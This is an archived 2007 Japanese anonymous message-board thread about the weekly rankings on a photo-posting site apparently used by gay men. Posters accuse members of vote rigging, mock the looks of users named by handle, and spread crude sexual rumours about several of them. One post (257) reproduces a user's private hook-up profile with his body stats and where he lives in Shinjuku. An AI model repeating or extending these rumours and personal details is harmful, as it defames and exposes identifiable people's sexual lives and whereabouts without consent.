226 :禁断の名無しさん:2007/01/17(水) 00:08:21 ID:II70eJXw
べスボのランキングがあきらかにおかしい感じがするのは俺だけ?
どうゆうシステムだよべスボ。

227 :禁断の名無しさん:2007/01/17(水) 01:49:22 ID:octEAaf2
J坊って人かわいそうな肌してるね…
ブラマヨみたい。
皮膚科に通えばいいのに。メイクしてベスボ登場してる場合じゃないよ。
大丈夫かな…

228 :禁断の名無しさん:2007/01/17(水) 06:07:31 ID:YwsK7rU2
>>226同感。ajやキヨなんて奴が上位なのが意味分らない。ベスボ終わってる。でも久々みたけど髭猿やヒデユキってこんなブサだった?ヒデユキなんてモノクロじゃなきゃ普通のおっさんだよ

229 :禁断の名無しさん:2007/01/17(水) 07:09:20 ID:CLDofjj6
髭猿もニチョでケツマンコやりまくってるから変な病気なんじゃない?(笑)

この前リュウガが生乱交に居たが前より更に女っぽくなってたな…オネー丸出しで種壷になってた

230 :禁断の名無しさん:2007/01/17(水) 09:00:57 ID:tIJOOlU8
投稿してない身でいうの何だけど今週最悪。

知り合い同士いっしょに載せて感想書きあって投票しあって。
そりゃ、知り合いじゃなきゃ感想書きにくいだろうけど露骨すぎるし、あれじゃ新規が投稿しづらい雰囲気だと思う。


なんか、中学や高校の女グループ見てるみたいで不快。内面も男みたいな奴いないんかなー

231 :禁断の名無しさん:2007/01/17(水) 10:43:21 ID:jNvMf96N
水泳部だっけ?消えちゃってる。悪用だったのかorz

232 :禁断の名無しさん:2007/01/17(水) 12:28:02 ID:pvBlRMkg
>>230ヒデユキが書いたキヨの感想見てみw
キヨにあのコメント書いた後にすぐ載せてるし
知ってる人がいるから票が入るという考えで投稿してるのがばればれ。

233 :禁断の名無しさん:2007/01/17(水) 17:29:32 ID:s4jA3jTW
髭猿見飽きた

234 :禁断の名無しさん:2007/01/17(水) 19:03:31 ID:tIJOOlU8
>>232
見たけど酷いは。
仲良いのわかったから個人HPみたいのでヤレと言いたい。

235 :禁断の名無しさん:2007/01/17(水) 23:14:30 ID:II70eJXw
髭猿かなり劣化ししてるな、昔は可愛かったけども。
俺的にカズキ・KO-U・英ノ介がヒットかな。
ヒデユキ顔でかいし、ついに詐欺画像も撮れなくなったのか。

236 :禁断の名無しさん:2007/01/17(水) 23:42:59 ID:21++0GLb
劣化して1位とかどんだけ…
英ノ介もかっこ良い ko-uは禿げてる

237 :禁断の名無しさん:2007/01/17(水) 23:59:47 ID:9y7P/FGf
髭猿くんはヤリマンなんでつか?ニチョに行けばヤれまつか?Ww

238 :禁断の名無しさん:2007/01/18(木) 00:25:38 ID:RkVPAB8r
内輪で盛り上がるの、全盛期はもっと酷かった。
組織票で毎週同じメンバーが上位になってた。

239 :禁断の名無しさん:2007/01/18(木) 00:43:20 ID:+WPkyDz1
今回の髭猿くんは違うとでも?笑

240 :禁断の名無しさん:2007/01/18(木) 00:46:09 ID:1P2vTOI9
キヨのケツマン使った事あるわよ。思ったより締まってたわ。

241 :禁断の名無しさん:2007/01/18(木) 01:05:15 ID:Vw/f8PVx
KO-Uってリバらしいけど、タチる時は体専だからガタイよくないと駄目らしい。
だから、体画像のっけてたのか。W
俺もヤラレタイ!!

242 :禁断の名無しさん:2007/01/18(木) 02:33:02 ID:+WPkyDz1
結局みんなヤリヤリで相手ソソるために載せてるん?

243 :禁断の名無しさん:2007/01/18(木) 08:08:28 ID:edCHCVXH
>>237
髭猿やリュウガはヤリマン店子だよ

244 :禁断の名無しさん:2007/01/18(木) 09:47:44 ID:v8CTQum2
>>237
>>240
>>241
>>242
>>243
こういう流れももう飽きた どうでもいいし真実味が無さ過ぎ

245 :禁断の名無しさん:2007/01/18(木) 10:33:35 ID:lwF6+/ra
ストーカーども!!いい加減
誹謗中傷はやめろ

246 :禁断の名無しさん:2007/01/18(木) 11:29:04 ID:1P2vTOI9
あら>>240は本当よ。
ごちそうさまでした。

247 :禁断の名無しさん:2007/01/18(木) 13:21:23 ID:BUjYc2EM
>>246 あなた羨ましいわ。あたしキヨみたいな魚顔好きなのよ。いつ頃の話?詳しく聞きたいわ。

248 :禁断の名無しさん:2007/01/18(木) 13:42:40 ID:BrEaheRb
DDの2本ある歯ブラシが気になるわ…

249 :禁断の名無しさん:2007/01/18(木) 19:07:56 ID:edCHCVXH
>>244
真実味も何も…事実だけど?MNJのエリアボードでケツマン掘ってくれって募集してるし。

転送メールのアドレス載せようか?送って来た画像だってある。
マンコがユルユルなのも事実

全て現実
こんなの作り話にしたって何の面白味も無いさ

250 :禁断の名無しさん:2007/01/18(木) 20:10:46 ID:SXDSSSQU
悪用してるだけ

251 :禁断の名無しさん:2007/01/18(木) 20:17:32 ID:1P2vTOI9
>>247
今月の話よ。実物はもっと魚顔よ。

252 :禁断の名無しさん:2007/01/18(木) 20:19:56 ID:edCHCVXH
>>250
悪用も何も家行って掘ったし(笑)
リュウガなんてニチョ近くに住んでるよ

嘘なんて何ひとつついてないし

まぁ何でもいいか。ただの店子ネタは

253 :禁断の名無しさん:2007/01/18(木) 22:23:05 ID:+WPkyDz1
ランキング組織票が動いてるのか?

254 :禁断の名無しさん:2007/01/19(金) 01:35:11 ID:r0Ia26+J
リュウガってどこの店子?

255 :禁断の名無しさん:2007/01/19(金) 02:00:35 ID:6ebEeNER
髭猿はまだタンクトップにいるの?

256 :禁断の名無しさん:2007/01/19(金) 03:36:40 ID:iM2ReyMV
>>249>>252
なんでsageてんだアホ

つか>>249>>252が事実だったとしてもリュウガ投稿してねえしどうでもよくね?
>こんなの作り話にしたってなんの面白味も無いさ
>>249の話に面白味を感じたことがまず無いさwwwwwwwwww







おい キヨが消えたぞ ここ見たんじゃねえか?

257 :禁断の名無しさん:2007/01/19(金) 05:39:07 ID:t1EADTc2
>>256

本当だったとしても〜投稿してないしとか意味不明だし、sageでもいいんじゃないかしら?
あなたごちゃごちゃ書いて見にくいのよね

リュウガはよく載せてるのとユルマンってのは事実ね。あとオネーよ。


170#59#25
今から、うち来てやれるタチの人いない?
見た目ウルフカットであっさりした感じです。
新宿場所ありだよ


5丁目に住んでるのよw
地元は神奈川よ

別にヤリマンだから悪いとか、店子だから悪いってのは無いしいいんじゃない?

258 :禁断の名無しさん:2007/01/19(金) 13:12:57 ID:iM2ReyMV
>>257
>本当だったとしても〜投稿してないしとか意味不明だし、sageでもいいんじゃないかしら?
あなたごちゃごちゃ書いて見にくいのよね

日付が変わりIDが変わると sageずにおねえ口調になる>>249>>252
>>256につられる奴は今の流れじゃ>>249>>252しかおらんw




同性愛のスレは 普通の口調とおねえ口調を使い分ける自作自演の奴が多いので有名
当然このスレも自作自演が多いw








となれば>>257の次なる行動は ネットカフェや携帯やらでIDを変えてsageてくるだろうw

259 :禁断の名無しさん:2007/01/19(金) 14:10:56 ID:AvS9nehq
はー店子やヤリマンばっかりなのねー。萎えるわ。

260 :禁断の名無しさん:2007/01/20(土) 03:14:53 ID:uq62PVsY
キヨが居なくなったわね。

261 :禁断の名無しさん:2007/01/20(土) 03:41:44 ID:4wGGvXwn
>>257
あら?意外とチビなのね。180くらいあるかと思ったわ

262 :禁断の名無しさん:2007/01/20(土) 05:49:26 ID:Z2fEcdWM
>>257 他人のプロフを無断で載せてる時点でアンタ犯罪なんだよ。それに輪をかけてワケ分からん解説付けて得意げにえばりくさって。

263 :禁断の名無しさん:2007/01/20(土) 07:51:08 ID:tk0qQhZy
ホントだよね〜
嫌いじゃないくせにね〜
基本さ〜、ベスボになんて載せてる時点で頭悪いし正常ではないわけよ〜
絶対、病んでるナルシストばっかだって!
よく考えたら普通の頭の持ち主ならば投稿できないって、
しかも昔から他のサイトで懲りず載せてきてる奴いるしさ〜
ビデオ出る奴もチンコ画像載せてた奴も店子の奴もいるけど、
こいつらのビデオ持ってる奴、画像持ってる奴、相手を知ってる奴の方が100%強いんだから、うちらで上げてやろ〜!


264 :禁断の名無しさん:2007/01/20(土) 09:18:37 ID:+Z7eB4jE
>>262
リュウガ乙。

ビデオでケツ掘られてアンアン言ってるしネットでタチのセクフレ募集すんの位普通だよ(笑)

ベスボとかに載せる時点でネタにされるのは仕方ないんじゃないかな

265 :禁断の名無しさん:2007/01/20(土) 16:44:06 ID:RUFbcztR
田舎者のゲイが好奇心&出会い求めてベスボに載せるのは理解できる。
2ちょ出てる&ビデオ、雑誌モデルやってる奴が載せてるのは意味わかんね。

266 :禁断の名無しさん:2007/01/20(土) 19:49:50 ID:uq62PVsY
リュウガなんのビデオに出てんの?

267 :禁断の名無しさん:2007/01/21(日) 07:39:59 ID:hk4wS44w
↑自分で探せよ、ばか
金払ってくれれば、相手してやっから

268 :禁断の名無しさん:2007/01/21(日) 09:10:01 ID:9UxeIvRx
あんた達、ベスボの雄大ご覧になったのかしら?あたしはとてもタイプでハマってしまったわ

269 :禁断の名無しさん:2007/01/21(日) 19:57:34 ID:8nN+p2Qy
今週の一位から十位どうなってんの?お世辞でもカッコイイと言えない子ばっかw あの顔がモテてきてるの?

270 :禁断の名無しさん:2007/01/21(日) 20:50:39 ID:mFWmGRbF
リュウガってなんのビデオに出てんの?

271 :禁断の名無しさん:2007/01/21(日) 21:20:27 ID:Rl8zG+bO
ちょっと!マッコリの画像みんな見てっ!ネコに女の幽霊が取り憑いてるわよ!

272 :禁断の名無しさん:2007/01/21(日) 21:30:13 ID:6XKBHPxp
>>271
あ れ は な い www

273 :禁断の名無しさん:2007/01/21(日) 21:39:05 ID:Rl8zG+bO
>>272 それっぽく見えない?写メ横にしたら。霊感ないけど

274 :禁断の名無しさん:2007/01/21(日) 21:53:38 ID:6XKBHPxp
>>273
あの写メ自体が『ない』と思ったんスよ
つか…俺、霊感無いと思ってたけどあの画像で見つけてしまったかもしれないww

275 :禁断の名無しさん:2007/01/21(日) 22:47:34 ID:Rl8zG+bO
だよね

276 :禁断の名無しさん:2007/01/21(日) 23:12:38 ID:TAMvGQUt
その人モミアゲが特に気持ち悪いww

277 :禁断の名無しさん:2007/01/21(日) 23:17:38 ID:OhV1P5cs
こわっ!!明らかっしょ?あれは…

278 :禁断の名無しさん:2007/01/22(月) 00:05:25 ID:BVI5bL4b
前から思ってたんだけど、
卒業って何よ?
ここはモー娘か何かか?

279 :禁断の名無しさん:2007/01/22(月) 00:08:31 ID:V4FJQMDK
幽霊コワス!
偶然だろうがあからさまに女が見える…コワスコワス

280 :禁断の名無しさん:2007/01/22(月) 03:11:04 ID:HwuTW/+F
ちょっとどこよ?どこのカテゴリー?

281 :禁断の名無しさん:2007/01/22(月) 13:03:54 ID:ndIrbnuG
マジだマジ!ありゃ幽霊にしか見えない…マンマーー!怖い

282 :禁断の名無しさん:2007/01/22(月) 14:37:12 ID:SEhWz0AP
確かに幽霊にみえるわね

相変わらずレベルの低いランキングだこと
一位と二位いらね

283 :禁断の名無しさん:2007/01/22(月) 14:44:52 ID:NFc3XyHd
みんなで感想書いてやりましょうよ
ネコちゃんの身体になんかあったら可愛そうじゃない…

284 :禁断の名無しさん:2007/01/22(月) 16:43:28 ID:VgT466LT
短刀直入に言ってみた

285 :禁断の名無しさん:2007/01/22(月) 19:12:01 ID:NFc3XyHd
返事きてるしw
ウケる〜
間接的に知らない人達が繋がってるw

286 :禁断の名無しさん:2007/01/23(火) 06:44:47 ID:eqymb41g
この際だからマッコリ姉さんに一票入れてきた。
人柄は良さそうよね
あのセピアのキモ憎には負けて欲しくない

287 :禁断の名無しさん:2007/01/24(水) 22:31:16 ID:Mu5+LvgD
アピボでマッコリ失言!うはぁww


75 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)